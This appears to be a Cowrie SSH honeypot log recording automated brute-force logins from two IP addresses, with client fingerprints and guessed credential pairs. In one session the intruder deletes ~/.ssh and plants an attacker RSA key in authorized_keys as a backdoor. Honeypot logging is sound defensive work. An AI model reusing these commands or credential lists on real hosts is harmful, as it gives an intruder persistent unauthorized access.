{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:53:14.083394Z","src_ip":"212.227.235.229","session":"ee3c4a2e124c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:53:15.098926Z","src_ip":"212.227.235.229","session":"ee3c4a2e124c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:16.344922Z","src_ip":"212.227.235.229","session":"ee3c4a2e124c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53312,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cee68017173","protocol":"ssh","message":"New connection: 212.227.235.229:53312 (1.2.3.4:22) [session: 4cee68017173]","sensor":"my-vps","timestamp":"2025-09-09T05:53:16.589977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:53:16.590600Z","src_ip":"212.227.235.229","session":"4cee68017173"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:53:16.836210Z","src_ip":"212.227.235.229","session":"4cee68017173"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:53:17.859825Z","src_ip":"212.227.235.229","session":"4cee68017173"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:18.107569Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:18.108682Z","src_ip":"212.227.235.229","session":"4cee68017173"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48596,"dst_ip":"1.2.3.4","dst_port":22,"session":"faf5238a4bfc","protocol":"ssh","message":"New connection: 212.227.235.229:48596 (1.2.3.4:22) [session: faf5238a4bfc]","sensor":"my-vps","timestamp":"2025-09-09T05:53:22.202636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:53:22.203856Z","src_ip":"212.227.235.229","session":"faf5238a4bfc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:53:22.283887Z","src_ip":"212.227.235.229","session":"faf5238a4bfc"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2@2025","message":"login attempt [test2/test2@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T05:53:22.647702Z","src_ip":"212.227.235.229","session":"faf5238a4bfc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:23.731031Z","src_ip":"212.227.235.229","session":"faf5238a4bfc"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":36292,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac5c60841396","protocol":"ssh","message":"New connection: 213.6.203.226:36292 (1.2.3.4:22) [session: ac5c60841396]","sensor":"my-vps","timestamp":"2025-09-09T05:53:27.456922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:53:27.458053Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:53:27.526476Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.login.success","username":"root","password":"Support12!","message":"login attempt [root/Support12!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:53:27.853871Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:53:28.011261Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.012004Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.012893Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.082627Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:53:28.322426Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.323129Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.394017Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.394916Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":57036,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d66bbfced63","protocol":"ssh","message":"New connection: 213.6.203.226:57036 (1.2.3.4:22) [session: 1d66bbfced63]","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.458093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.458855Z","src_ip":"213.6.203.226","session":"1d66bbfced63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.525612Z","src_ip":"213.6.203.226","session":"1d66bbfced63"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:53:28.832868Z","src_ip":"213.6.203.226","session":"1d66bbfced63"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:29.901111Z","src_ip":"213.6.203.226","session":"1d66bbfced63"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":33043,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4ea0967354e","protocol":"ssh","message":"New connection: 213.6.203.226:33043 (1.2.3.4:22) [session: f4ea0967354e]","sensor":"my-vps","timestamp":"2025-09-09T05:53:29.968313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:53:29.969465Z","src_ip":"213.6.203.226","session":"f4ea0967354e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:53:30.035935Z","src_ip":"213.6.203.226","session":"f4ea0967354e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:53:30.304816Z","src_ip":"213.6.203.226","session":"f4ea0967354e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:30.372759Z","src_ip":"213.6.203.226","session":"ac5c60841396"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:30.374079Z","src_ip":"213.6.203.226","session":"f4ea0967354e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58800,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d9c112aa36c","protocol":"ssh","message":"New connection: 212.227.235.229:58800 (1.2.3.4:22) [session: 7d9c112aa36c]","sensor":"my-vps","timestamp":"2025-09-09T05:53:32.074315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:53:32.080177Z","src_ip":"212.227.235.229","session":"7d9c112aa36c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:53:32.259183Z","src_ip":"212.227.235.229","session":"7d9c112aa36c"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"11223344","message":"login attempt [ubuntu/11223344] failed","sensor":"my-vps","timestamp":"2025-09-09T05:53:32.993397Z","src_ip":"212.227.235.229","session":"7d9c112aa36c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:34.180818Z","src_ip":"212.227.235.229","session":"7d9c112aa36c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35342,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc933fa220ec","protocol":"ssh","message":"New connection: 212.227.235.229:35342 (1.2.3.4:22) [session: bc933fa220ec]","sensor":"my-vps","timestamp":"2025-09-09T05:53:46.245686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:53:46.246725Z","src_ip":"212.227.235.229","session":"bc933fa220ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:53:46.445338Z","src_ip":"212.227.235.229","session":"bc933fa220ec"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"111","message":"login attempt [gaoyuan/111] failed","sensor":"my-vps","timestamp":"2025-09-09T05:53:47.363780Z","src_ip":"212.227.235.229","session":"bc933fa220ec"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:48.543324Z","src_ip":"212.227.235.229","session":"bc933fa220ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38777,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a20ac066894","protocol":"ssh","message":"New connection: 212.227.235.229:38777 (1.2.3.4:22) [session: 2a20ac066894]","sensor":"my-vps","timestamp":"2025-09-09T05:54:02.832690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:54:02.835613Z","src_ip":"212.227.235.229","session":"2a20ac066894"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:54:02.901819Z","src_ip":"212.227.235.229","session":"2a20ac066894"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345678","message":"login attempt [centos/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T05:54:03.171499Z","src_ip":"212.227.235.229","session":"2a20ac066894"}
